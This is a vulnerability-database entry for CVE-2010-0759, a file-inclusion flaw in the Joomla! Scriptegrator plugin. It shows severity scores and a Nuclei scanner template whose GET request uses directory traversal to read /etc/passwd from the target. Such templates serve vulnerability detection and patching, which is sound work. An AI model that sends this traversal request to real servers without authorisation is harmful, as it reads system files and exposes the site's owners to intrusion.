Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-0759
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Plugin Core Design Scriptegrator - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
9

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.8 Medium

AI Score

Confidence

High

0.016 Low

EPSS

Percentile

87.3%

A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.

id: CVE-2010-0759

info:
  name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/11498
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0759
    - http://www.exploit-db.com/exploits/11498
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-0759
    cwe-id: CWE-22
    epss-score: 0.01569
    epss-percentile: 0.87232
    cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: greatjoomla
    product: scriptegrator_plugin
  tags: cve,cve2010,joomla,lfi,plugin,edb,greatjoomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dc0516314760341830b6d829ac3d71cca66d790eed97e8c05aecafcac46e6b47022100c7ad39fcf6a99cad4066323df1b8cea073d37e4621111901fca6e3879bac4fb8:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.8 Medium

AI Score

Confidence

High

0.016 Low

EPSS

Percentile

87.3%

Related for NUCLEI:CVE-2010-0759